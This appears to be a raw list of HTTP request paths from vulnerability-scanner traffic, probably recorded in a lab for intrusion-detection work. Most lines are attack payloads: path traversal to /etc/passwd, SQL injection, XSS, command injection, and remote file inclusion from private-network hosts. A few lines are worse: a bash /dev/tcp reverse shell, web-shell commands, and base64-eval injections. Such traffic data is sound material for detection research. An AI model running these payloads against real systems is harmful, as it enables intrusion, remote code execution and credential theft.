ftp://192.168.22.152/*
/bin/testcgi.exe
/menu-description/
/javascript/test1234.exe
/scgi-bin/gw5/gwweb.exe?htmlver=aaa&get-context
/top.php?stuff="&ping\xa0-w\xa09000\xa0-n\xa01\xa04.3.2.1&rem\xa0
/webcgi/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
/1qwv2p5p.jsp?
/help.php?q="&del q31935143&rem
/cacti/themes/program/themesettings.inc.php?themesdir=/etc/passwd\x00
/en-us/9kr0ih0v.fts?
/6dlc2zm9.mscgi?
/ping_scripts/
/r3le3om5.pl?
/examples/servlets/servlet/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl
//q47417758&q6971"q6971<q6971>q47417758
/mv8wxfy9.dll?
/examples/jsp/jsp2/jspx/doc/index.php?s=/etc/passwd\x00
/o1zj4u9v.x?
/script/menu/menuprincipal.php?path_inc=http://cirt.net/rfiinc.txt?
/cacti/core/editor.php?editor_insert_bottom=/etc/passwd
/examples/jsp/cal/index.php?op=default&date=200607' union select 1,1085399282,1,1,1,1,1,1,1,1--&blogid=1
/manager/shopaddtocart.asp?productid='42
/cgi-bin/login.php?error=>">
/opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.118:8080/zz5thkvtmlgl?\x00
/projects/1/repository/annotate?rev=`0<&173-;exec 173<>/dev/tcp/192.168.202.118/21785;sh <&173 >&173 2>&173`
/vjbrrppi.nsf?
/main.php?logout=&ver >q73636738&rem
/examples/jsp/jsp2/jspx/adlayer.php?layerstyle=../../../../../../../etc/passwd\x00
/vwmg565s.jsp?
/phpmyadmin/starnet/addons/slideshow_full.php?album_name='1590453229
/uvazfs7p.cfc?
/officescan/console/html/cgi/cgichkmasterpwd.exe
/s7qus4g3.do?
/cacti/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl
/examples/jsp/sessions/index.php?user_langue=../../../../../../../../../../etc/passwd
/examples/jsp/checkbox/starnet/addons/slideshow_full.php?album_name='1511206364
/3hlysl2x.cfm?
/top.php?stuff=&ver\x09>q17672958&rem\x09
/top.php?stuff="&ver;>q42621598&rem;
/cgi-915/query?mss=../config
/webscarabxss/
/javascript/caller.exe
/javascript/rsa.exe
/subscriptions.meta
/manager/index.php?template=../../../loudblog/custom/config.php\x00
/awstats/awstats.pl?migrate=|echo;/./tmp/cegnlginfc.sh;echo|awstats119356.txt
/interface/login/login_frame.php?site= and 1=2
/subscriptioninfo/
/forum_arc.asp?n=/....../boot.ini|36|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_'/'.
/iv5vkgam.php3?
/inscription/
/cacti/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd\x00
/webdav/c99.php?act=cmd&d=c:\xampp\webdav\&cmd=c:\xamp\webdav\phonehome_script.exe+-h+recompiler&cmd_txt=1&submit=execute
/scripts/search.jsp?q=%"
/javascript/axis2-admin.exe
/bxnyrhmh.jsp?
/main.php?stuff="del\xa0q33347165&rem\xa0
/javascript/zope.exe
/include/scripts/export_batch.inc.php?dir=http://192.168.202.96:8080/txenjrxf3?
/path_script/createurl.php?formurl=http://192.168.202.96:8080/vir0v3xfc?
/productsbycategory.asp?intcatalogid=3'&strcatalog_name=nessus
/1r8cfrlf.pl?
/ans.pl?p=../../../../../usr/bin/id|&blah
/the scientist & engineer's guide to digital signal processing/
/h5sc3gxy.jspa?
/phpmyadmin//..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafwindows/win.ini
/manager/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1
/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/pzeceeynoq0+>+/dev/null+&'); function v
/examples/servlets/servlet/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini
/cacti/index.php?id='
/scripts/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=;
/event_description/
/cacti/anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd
/5qnlm5z2.idc?
/mpcgi/pfdispaly.cgi?'\x0a/bin/cat /etc/passwd|'
/main.php?logout="\x0duname >q11745557 #
/5qnlm5z2.html?
/manager/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\x00
/examples/jsp/cal/htsearch?exclude=`/etc/passwd`
/help.php?q=ver,>q21492123&rem,
/cgi-915/gw5/gwweb.exe?help=bad-request
/d765w06j.nsf?
/i686v90l.php3?
/d7ktpmcq.jsp?
/top.php?stuff="&ping\x09-w\x0911000\x09-n\x091\x091.2.3.4&rem\x09
/javascript/robots.exe
/82q7ywa8.html?
/phpmyadmin/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331923204','5'--
/help.php?q="&ver\x0b>q26193259&rem\x0b
/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosconfig_absolute_path=http://192.168.202.118:8080/moclyxlwqyfjnp?
/main.php?logout=|ping;-w;9000;-n;1;1.2.3.4|rem;
/learnjscript/
/recordings/mlog.html?screen=/etc/passwd
/scripts/xtextarea.scr.php?globals[pth][spaw]=http://192.168.202.118:8080/moclyxlwqyfjnp??
/nyjgaorz.cfm?
/help.php?q="|ping;-w;8000;-n;1;1.2.3.4|rem;
/xlj7h65o.asp?
/rv98iwjp.php3?
/phpmyadmin/rss.php?blogid=1&profile=../../config/config.properties.php\x00
/javascript/webshop.exe
/bin/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=
/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331919143&lang_crm=../../../../../../../../../../../..//boot.ini\x00
/cgi-bin/www/delivery/ac.php?bannerid=-1331904367+or+1=1+--+';passthru(base64_decode($_server[http_nessus_y1ahivl4]));die;/*
/nmw0do67.cfc?
/scripts/faq.php?action=&type=view&s=&id=-1' union select 0,1702272795,0,0,0,0,0--
/manager/core/api.php?t_path_core=/etc/passwd\x00
/pxagj7n7.dll?
/main.php?stuff="del\xa0q89318346&rem\xa0
/examples/jsp/num/notify?from=nessus"|id"
/javascript/document.ep
/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,504398662),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
/
/sysuser/docmgr/iecreate.stm?template=../
/um7xpn15.x?
/scripts/yfmo7jpwvpv1.asp
/include/default_header.php?script_path=http://cirt.net/rfiinc.txt?
/cgis/fileseek.cgi?foot=&head=;cat /etc/passwd|
/main.php?logout="\x0drm q11745557 #
/examples/jsp/colors/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd\x00
/ttxssh2_213/
/9o6g5vkn.x?
/examples/jsp/checkbox/docs/index.php?lang=/../../../../../../../../../../etc/passwd\x00
/cgi-bin/cvsblame.cgi?file=
/top.php?stuff="&ping\x09-w\x0910000\x09-n\x091\x094.3.2.1&rem\x09
/cgi-914/fileseek.cgi?foot=&head=;cat /etc/passwd|
/it's a wonderful life - alchemy_rg/
/cgi-bin/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd
/examples/jsp/sessions/faxsurvey?cat /etc/passwd
/scripts/news.scr.php?globals[pth][classes]=http://192.168.202.118:8080/zz5thkvtmlgl??
/video_subscription/
/post.asp?method=topic&forum_id=1&cat_id=1&type=wvs-xss-magic-string-410016083323
/o6ebbirj.idc?
/help.php?q="&ver,>q17457396&rem,
/examples/jsp/error/supporter/tupdate.php?groupid=change&sg='
/p043snfr.asp?
/t3af3tdz.jspa?
/l752x1ry.exe?
/scriptpath/index.php?page=http://192.168.202.96:8080/whmch8ftkt7kv?
/subscriptiontab/
/serversidescripting/
/t3af3tdz.dll?
/hipkz026.jspa?
/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904220&lang_crm=../../vtigerservice.php\x00
/n9xlumt5.cfc?
/examples/servlets/servlet/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\x00
/n1afe1y6.asp?
/search.php?do_search=search&searchword="/><"1&catid_search=0
/forum1.asp?n=1753&nn=/etc/passwd
/m4kkjf8l.dll?
/help.php?q="|ping\xa0-w\xa010000\xa0-n\xa01\xa04.3.2.1|rem\xa0
/examples/jsp/num/base_local_rules.php?dir=
/script_path/config.inc.php?_path=@rfiurl?_path=@rfiurl?
/chat_script/
/opensiteadmin/scripts/classes/form.php?path=http://192.168.202.118:8080/zz5thkvtmlgl?\x00
/fcgi-bin/windmail.exe
/3m5knyc4.asp?
/order/login.php?svr_rootscript=http://192.168.202.118:8080/ghl9il?
/verify.asp?username='
/en-us/i686v90l.fts?
/d44uk9h2.htm?
/javascript/subscribe.exe
/webdav/phprun.php?cmd=c:\wce.exe -l
//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/'.$_server['php_self'].'?act=img&img=delete
/yver8r9o.nsf?
/gy23xnjq.aspx?
/scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331919001
/cgi-bin/scripts/*\x0a.pl
/javascript/monthly.exe
/cacti/shared/help.php?page=../../../../../../../../../../etc/passwd\x00
/javascript/check.exe
/169okeyj.nsf?
/opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.96:8080/txenjrxf3?\x00
/scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://192.168.202.118:8080/iroy1gvqrrqu?
/scripting-r0/
/examples/jsp/checkbox/snpfiltered.pl?t=c&u=
/webcgi/fileseek.cgi?foot=;cat /etc/passwd&head=
/.dll
/lmw4r201.asp?
/examples/jsp/error/forum_2.php?msg=10&return=
/examples/jsp/sessions/web_store/web_store.cgi?page=../../../../../../etc/passwd\x00.html
/
/jnv890lt.nsf?
/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331909407','5'--
/examples/servlets/servlet/edit.jsp?page=user&editor=../../../install
/eei78ore.do?
/javascript/compressed.exe
/main.php?stuff="uname >q49686563 #
/top.php?stuff=ver\x0b>q36516596&rem\x0b
/top.php?stuff=\x0auname\x09>q15522652\x09#
/cacti/index.php?album=../../../../../../../../../../etc/passwd\x00
/zul'gurub/
/examples/jsp/error/port.php?proto=tcp'
/recordings/port.php?proto=tcp'
/examples/jsp/num/simple/view_page?mv_arg=|cat /etc/passwd|
/scripts/editor/filemanager/connectors/php/upload.php?command=fileupload&type=file¤tfolder=/fckeditor_currentfolder_file_upload-1331904471.php.
/recordings/directory.php?dir=;cat /etc/passwd
/examples/jsp/sessions/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini
/examples/jsp/cal/user.cgi?url=">&from=add
/weq93ppb.pl?
/pxtoolbar.exe/
/examples/servlets/servlet/shopaddtocart.asp?productid='42
/jnv890lt.asp?
/examples/jsp/num/edit.jsp?page=user&editor=../../../install
/d5a5renl.x?
/examples/jsp/security/protected/j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee61586800228~
/ddoworrl.idc?
/en-us/fo564rei.htm?
/webmaster-scripts/
/.svn/text-base/.htpasswd.svn-base
/main.php?stuff="ver\x0b>q36113668&rem\x0b
/downloads/pafiledb.php?action=rate&id=4?\"<script>alert('vulnerable')</script>\"
/examples/jsp/cal/cal2.jsp?time=8am style=xss:e/**/xpression(try{a=firsttime}catch(e){firsttime=1;alert('tomcat_sample_cal2_xss2.nasl')});
/cacti/search.php?searchstring=
/iajtej82.pl?
/examples/jsp/error/showproduct.php?product=1'
/esmozg5d.htm?
/en-us/hipkz026.dll?
/scripts/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1247962577,2,176146104,4,5,6,7,8,9,0,1,2,3 --
/help.php?q="\x0drm\x09q93881688\x09#
/javascript/cookie.exe
/edzaia0i.jspa?
/script/menu/menuprincipal.php?path_inc=http://192.168.202.96:8080/4dckqcc0acprbz?
/main.php?logout='&sleep\x0910\x09#
/scripts/.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./winnt/win.ini
/script/ident/loginliste.php?path_inc=http://192.168.202.118:8080/ghl9il?
/index.php?id='union/**/select/**/0,0,1888865436,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
/scripts/
/d5a5renl.pl?
/i7prbs22.fts?
/javascript/controller.exe
/0u75ldxq.jspa?
/x2gyorli.kspx?
/magazine_subscriptions/
/help.php?q='&del\x09q11888742\x09#
/scriptpath/index.php?page=http://192.168.202.118:8080/zz5thkvtmlgl?
/help.php?q="\x0arm\x09q76195479\x09#
/scripts/event_view.php?eid=34 union select 125016811
/scripts/9pen4xzgztjn.inc
/aj3pf49c.exe?
/phpmyadmin/apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini
/cgi-bin/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl
/scripts/calendar_admin.pl?config=|cat /etc/passwd|
/cgi-sys/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=
/ywaxntrx.do?
/7uz3ok60.cfc?
/zroo33l4.nsf?
/interface/login/login_frame.php?site=;waitfor delay '0:0:15';--
/examples/jsp/colors/cal_make.pl?p0=../../../../../../../../../etc/passwd\x00
/help.php?q=";sleep 9 #
/phpmyadmin/search.jsp?q=%"
/examples/jsp/checkbox/item.fts?href=">;
/examples/servlets/servlet/upgrade/index.php?steporder[]=../../../../../../../../../../../../etc/passwd\x00
/scripts/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1332008335,1,1403210863--
/scripts/msg.txt
/scripts/x_news.php
/opensiteadmin/scripts/classes/form.php?path=http://192.168.202.96:8080/swgnhpydbq0t?\x00
/main.php?stuff="|ping\xa0-w\xa08000\xa0-n\xa01\xa04.3.2.1|rem\xa0
/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+777+/tmp/liiwypqnoh.sh'); function v
/ovcgi/getnnmdata.exe
/scripts/1331919077-ror_session_fixation.nasl
/examples/jsp/colors/webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold
/top.php?stuff="\x0arm q56276124 #
/6dlc2zm9.nsf?
/examples/servlets/servlet/mlog.html?screen=/etc/passwd
/top.php?stuff='sleep 11 #
/en-us/account/index.php?id=mumrj3sj0o'
/zv8tv7h8.htm?
/scripts/6gl21a1hiz3s.cfm
/b4vng02k.aspx?
/dda2qr7j.php3?
/help.php?q="ping\xa0-w\xa011000\xa0-n\xa01\xa01.2.3.4&rem\xa0
/examples/servlets/servlet/index.php?action=login&languages[nessus]=syscp_1211.nasl&language=nessus&langs[nessus][0][file]=/etc/passwd
/odzk29aa.htm?
/main.php?stuff=&ver\x09>q82426871&rem\x09
/robocop director's cut/
/ows-bin/c32web.exe/changeadminpassword
/vac1l5vm.html?
/cgi-perl/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
/en-us/scripts
/examples/jsp/sessions/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl
/hipkz026.do?
/examples/jsp/error/nessus">
/scripts/c0kha6w3apd3.inc
/help.php?q=';del\x09q69988199\x09#
/main.php?logout="|ping\xa0-w\xa07000\xa0-n\xa01\xa04.3.2.1|rem\xa0
/lsoix5h3.cgi?
/script_path/cms/classes/openengine/filepool.php?oe_classpath=http://192.168.202.96:8080/4dckqcc0acprbz??
/h5i6crm3.kspx?
/help.php?q="\x0duname >q66781813 #
/iktok2bw.nsf?
/en-us/account/javascript.php?abs_path=/etc/passwd\x00
/mpcgi/pfdispaly.cgi?../../../../../../../../../../etc/passwd
/help.php?q='\x0duname\x09>q24981853\x09#
/cgi-scripts/
/82q7ywa8.mscgi?
/en-us/account/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331909400,244455451 --
/6qbynt4f.cfm?
/3j8echh0.dll?
/javascript/util.exe
/mpcgi/pfdisplay.cgi?'\x0a/bin/cat /etc/passwd|'
/33y9gcqq.html?
/w4996nr0.jspa?
/javascript/scheduling.exe
/help.php?q="ping -w 11000 -n 1 4.3.2.1&rem
/main.php?stuff="|ping\xa0-w\xa09000\xa0-n\xa01\xa04.3.2.1|rem\xa0
/examples/jsp/num/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\x00gwextranet_template_dir_traversal.nasl
/help.php?q="del\x09q91583756&rem\x09
/scripts/gallery.scr.php?globals[pth][func]=http://192.168.202.118:8080/zz5thkvtmlgl??
/169okeyj.do?
/i686v90l.php?
/examples/jsp/colors/admin/top.php?admindir=/etc/passwd\x00
/fcgi-bin/gw5/gwweb.exe?help=bad-request
/fc9t54l7.asp?
/ttxssh2_211/
/examples/jsp/colors/search.jsp?q=%"
/scripts/admin/admin.cgi
/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1332009307','5'--
/help.php?q=;uname >q94314237 #
/examples/jsp/error/index.pl/homels?func=add;class=webgui::asset::wobject::article;print `id`;
/mpcgi/gw5/gwweb.exe?htmlver=aaa&get-context
/starnet/addons/slideshow_full.php?album_name='1055703356
/phpmyadmin/cart32.exe
/order/login.php?svr_rootscript=http://cirt.net/rfiinc.txt?
/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332008595&lang_crm=../../vtigerservice.php\x00
/edv3mapy.asp?
/en-us/account/adlayer.php?layerstyle=../../../../../../../etc/passwd\x00
/awstats/awstats.pl?migrate=|echo;/./tmp/cbpxmnuvtn.sh;echo|awstats973506.txt
/login.php?ref='>
/examples/jsp/jsp2/el/core/api.php?t_path_core=/etc/passwd\x00
/examples/jsp/checkbox/man-cgi?section=0&topic=ls;id
/phpmyadmin/cal_make.pl?p0=../../../../../../../../../etc/passwd\x00
/cgi-home/view_item?html_file=../../../../../../../../../../etc/passwd\x00
/scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904228
/revdescription/
/phpmyadmin/directorypro.cgi?want=showcat&show=../../../../../etc/passwd\x00
/qb2xy9aw.php?
/main.php?frm_daynight=day&frm_passwd=q55541722&frm_referer=http%3a//192.168.23.202/main.php%3flogout%3d1&frm_user=&scr_height=&scr_width=
/pxagj7n7.php?
/ddoworrl.html?
/en-us/jnv890lt.dll?
/qczkquis.jspa?
/cgi-bin/listrec.pl?app=qmh-news&template=;ls /etc|
/scripts/base_main.php
/resetpw.php?email=../../../../../../../../../../../../etc/passwd
/examples/jsp/jsp2/el/a1disp3.cgi?/../../../../../../etc/passwd
/javascript/.htpasswd.sfish/-->">'>'"
/jsorijscript/
/examples/jsp/jsp2/jspx/wiki.php/
/cgi-bin/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\x00
/cgi-bin/base_local_rules.php?dir=
/0qhcnefz.cgi?
/bxnyrhmh.idc?
/en-us/dda2qr7j.nsf?
/nyjgaorz.cgi?
/main.php?stuff=&ping;-w;7000;-n;1;4.3.2.1&rem;
/cacti/config.php?returnpath=/etc/passwd\x00
/examples/jsp/jsp2/el/lib/adodb/server.php?sql='adodb_sql_sql_injection.nasl
/scripts/utilities/login.asp
/en-us/w4996nr0.exe?
/private's most beautiful breasts - silvia saint/
/ao22ww7y.dll?
/help.php?q='\x0drm q17837735 #
/rubrique.asp?no=/....../boot.ini|55|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_'/'.
/help.php?q="&uname\x09>q99796972\x09#
/help.php?q="&del q26584324&rem
/qb2xy9aw.asp?
/f-script/
/help.php?q="|ping\x09-w\x0910000\x09-n\x091\x094.3.2.1|rem\x09
/scripts/login.asp
/javascript/imagefolio.exe
/cgi-perl/.passwd
/mv8wxfy9.pl?
/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331905034&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
/examples/jsp/sessions/phf?qalias=x\x0a/bin/cat /etc/passwd
/scripts/lrn28issfuqi.php
/javascript/~test.exe
/9kr0ih0v.pl?
/main.php?stuff="ping;-w;11000;-n;1;4.3.2.1&rem;
/examples/servlets/servlet/simple/view_page?mv_arg=|cat /etc/passwd|
/recordings/js/scripts.php?load=/etc/passwd\x00
/main.php?stuff="&ver&rem;
/edv3mapy.htm?
/wheelman's - bushpig/
/lsoix5h3.php?
/6wb70v0b.php3?
/examples/jsp/colors/bandwidth/index.cgi?action=showmonth&year=&month=
/b4vng02k.php3?
/jnv890lt.php?
/cacti/sgdynamo.exe?htname=
/javascript/jpg.exe
/copatranscript_20061107/
/1qwv2p5p.kspx?
/en-us/account/include/error/autherror.cfm?errorcode=1&ftvar_linkp=">
/?
/scripts/ui/login?user=nessus-1331919064
/examples/servlets/servlet/starnet/addons/slideshow_full.php?album_name='868160889
/main.php?stuff='uname\x09#
/examples/jsp/cal/minis.php?month=../../../../../../etc/passwd
/hrttz9fj.jsp?
/aj3pf49c.mscgi?
/cgi-bin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1332010414,1557267964 --
/ghswfouu.html?
/fa8p8lr8.htm?
/j2kdmfw4.php3?
/index.php?c=access&a=login&ref_c=nessus">&ref_a=projectpier_login_page_xss.nasl">
/mysubscriptions/
/g3w7y7u5.php?
/0qhcnefz.nsf?
/pirvate/ltwpdfmonth.php?ltw_config['include_dir]=http://cirt.net/rfiinc.txt?
/examples/jsp/colors/embed/day.php?path=/etc/passwd\x00
/examples/jsp/num/item.fts?href=">;
/bn857frh.exe?
/scripts/qg9h0c0svvat.php
/main.php?stuff='sleep 9 #
/
/scripts/1hactwocbsuo.php3
/scripts/contents.htm
/top.php?stuff=&ver >q39715573&rem
/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://192.168.202.96:8080/vir0v3xfc??
/jdx255ea.do?
/templates/prescription/?d=a
//q47719336&q1431"q1431<q1431>q47719336
/apavxugx.jspa?
/main.php?logout="&ping\x0c-w\x0c8000\x0c-n\x0c1\x0c1.2.3.4&rem\x0c
/scripts/bizmail.cgi
/examples/jsp/checkbox/index.php?id='
/weq93ppb.dll?
/help.php?q='&uname\x09>q42899831\x09#
/top.php?stuff="&del,q38169729&rem,
/comments/browse.php?fid=2&tid=4&go=<script>alert('vulnerable')</script>
/6n7aacgg.x?
/ywaxntrx.exe?
/main.php?logout='sleep 9 #
/scripts/adodb/server.php?sql='adodb_sql_sql_injection.nasl
/main.php?logout="ver&rem
/en-us/esmozg5d.cfm?
/7uz3ok60.mscgi?
/cgi-home/sensepost.exe?/c+dir
/index.php?op=default&date=200607' union select 1,1310726682,1,1,1,1,1,1,1,1--&blogid=1
/scripts/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 760871658,2,576927904,4,5,6,7,8,9,0,1,2,3 --
/en-us/account/index.php?mod_id=2&kb_ask=
/yacs/scripts/update_trailer.php?context[path_to_root]=http://192.168.202.118:8080/zz5thkvtmlgl??
/top.php?stuff=\x0duname >q31716147 #
/examples/jsp/num/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\x00html
/examples/jsp/colors/supporter/tupdate.php?groupid=change&sg='
/cgi-bin/index.php?sensor_program=
/e9rx3ya4.jsp?
/recordingssearch_results.dot?search_query=nessus">/
/bl8sefdm.php?
/fmnveedu.do?
/admin/script.php
/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+555+/tmp/mpnqzgnare0;'); function v
/uc3w3bdi.jspa?
/m5103snj.cfm?
/vhzmaia2.aspx?
/javascript/porn.exe
/j4drbkil.php?
/main.php?stuff='\x0ddel\x09q61875212\x09#
/en-us/h5sc3gxy.jsp?
/3m5knyc4.cfc?
/ap58k3ci.php?
/vubbxss/
/cgi-bin/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331904418',null,null,null,null --
/javascript/document.stackdump
/scripts/admin/addentry.php?phpbb_root_path=/etc/passwd\x00
/cgi-bin/phptonuke.php?filnavn=/etc/passwd
/nsn/..\util/type.bas
/scripts/nryr3lvrjnwx.cgi
/examples/jsp/error/js/scripts.php?load=/etc/passwd\x00
/cgi-bin/search.php?searchstring=
/recordings/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini
/bxnyrhmh.x?
/zmvq66jy.dll?
/main.php?stuff=ver,>q34852419&rem,
/scripts/help.php?section='qualiteam_xcart_sql_xss.nasl
/cgi.cgi/windmail.exe
/examples/jsp/checkbox/sawmill6cl.exe?ho+{complete_version}
/cactisearch-results.dot?search_query=nessus">/
/en-us/account/starnet/addons/slideshow_full.php?album_name='1580973315
/scripts/base_local_rules.php?dir=
/en-us/ddoworrl.jspa?
/don't fuck this up/
/examples/jsp/num/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd
/h5i6crm3.exe?
/5o9zq43e.fts?
/1r8cfrlf.php?
/opensiteadmin/scripts/classes/fieldmanager.php?path=@rfiurl\x00
/scripts/cevvxrxqxc_b.inc
/main.php?stuff='\x0asleep 11 #
/help.php?q="rm;q77231587&rem;
/manager/include/sql.php?include_path=/etc/passwd\x00
/recordings/carbo.dll?icatcommand=..\..\..\..\..\..\winnt\win.ini&catalogname=catalog
/press-conference_transcript/
/en-us/account/error.php?selected_theme=
/examples/jsp/num/search.cgi?..\..\..\..\..\..\winnt\win.ini
/main.php?logout='\x0duname >q95689814 #
/main.php?logout="del\x09q46762746\x09#
/weq93ppb.cgi?
/recordings/help/index.php?help_file=../../../../../../../../../../../etc/passwd
/scripts/tomcat_proxy_directory_traversal.nasl1331909178
/scripts/tools/newdsn.exe
/ccert's practice in anti-spam/
/a0imiuf1.pl?
/footer.inc.php?la_pow_by=
/aj3pf49c.nsf?
/vhzmaia2.do?
/fnwhrxyd.html?
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+5b+0c+83+c3+0c+89+da+8b+5b+04+39+d3+75+01+cc+8b+73+30+89+ef+6a+0d+59+66+ad++>>ctdn
/q703m78q.idc?
/examples/jsp/security/protected/j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee6.bak
/t7tm4m0b.aspx?
/ydexw8by.jspa?
/help.php?q="\x0ddel\x09q41994252\x09#
/cgi-bin/store.cgi?startid=../../../../../../../../../../etc/passwd\x00.html
/forum/index.php?method=<script>alert('vulnerable')</script>
/fpnpp5zg.idc?
/examples/jsp/colors/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\x00
/main.php?stuff="|ping\x0b-w\x0b7000\x0b-n\x0b1\x0b4.3.2.1|rem\x0b
/cacti/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini
/examples/jsp/checkbox/base_qry_common.php?base_path=/etc/passwd\x00
/phpmyadmin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
/scripts/cdjnwtwnqga1.php3
/scripts/qbch5ojumj32.asp
/description-viagra/
/ygkjkngd.aspx?
/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+555+/tmp/pzeceeynoq0;'); function v
/help.php?q=;rm\x09q84834127\x09#
/examples/jsp/cal/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd||
/maxd641.exe/
/scripts/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor
/examples/jsp/num/al_initialize.php?alpath=/etc/passwd\x00
/examples/jsp/jsp2/jspx/shoutbox.php?conf=../
/scripts/customer.pl
/edv3mapy.kspx?
/phpmyadmin/docs/index.php?lang=/../../../../../../../../../../etc/passwd\x00
/scripts/webplus?about
/webcgi/htimage.exe/path/filename?2,2
/main.php?stuff="&del\x0bq52976574&rem\x0b
/opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.96:8080/no4ghqiguzhst?\x00
/nopasswd/
/0u75ldxq.php?
/themes/default/index.php?theme[options]=1&settings[skin]=../../default/images/top.gif\x00
/en-us/odzk29aa.nsf?
/m4kkjf8l.mscgi?
/scripts/environ.pl
/scripts/index.pl/homels?func=add;class=webgui::asset::wobject::article;print `id`;
/base_qry_common.php?base_path=/etc/passwd\x00
/fa8p8lr8.jspa?
/b1q8bywu.fts?
/examples/servlets/servlet/js/vendors.php?file=../../../../../../../../../../etc/passwd\x00nessus.js
/index.php?id='union/**/select/**/0,0,1424469027,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
/raanw4ia.aspx?
/examples/jsp/checkbox/viewpage.php?file=/etc/passwd
/examples/servlets/servlet/index.php?sensor_program=
/zv8tv7h8.mscgi?
/rv98iwjp.cfm?
/examples/jsp/error/index.cfm?fuseaction=category.display&category_id='
/5o9zq43e.php?
/main.php?stuff="&ver\x09>q89486418&rem\x09
/examples/jsp/jsp2/jspx/source?v=../../../../../../../../../../etc/passwd\x00
/fa8p8lr8.php3?
/awstats/awstats.pl?migrate=|echo;chmod 555 /tmp/qcywjpzuja0;echo|awstats232216.txt
/webcgi/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
/javascript/don.exe
/0qhcnefz.cgi?
/examples/servlets/servlet/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x
/script/gestion/index.php?path_inc=http://192.168.202.118:8080/2aibfaczmac8?
/test.php?evalme=eval($_server[http_x_axkqdcilykzzimkvzxg]);
/top.php?stuff='|sleep\x0910\x09#
/nispasswd/
/cgi-bin/bb_func_txt.php?pathtofiles=/etc/passwd\x00
/ace-auto's/
/examples/jsp/sessions/login.php?lang=/../../../../../../../../../../../../etc/passwd\x00.txt
/examples/jsp/colors/googlesearch/googlesearch.php?app[path][lib]=/etc/passwd\x00
/jules verne, the world's greatest prophet science and invention, vol/
/7o5qp766.php?
/zv8tv7h8.cgi?
/top.php?stuff="del,q55729425&rem,
/5qnlm5z2.jsp?
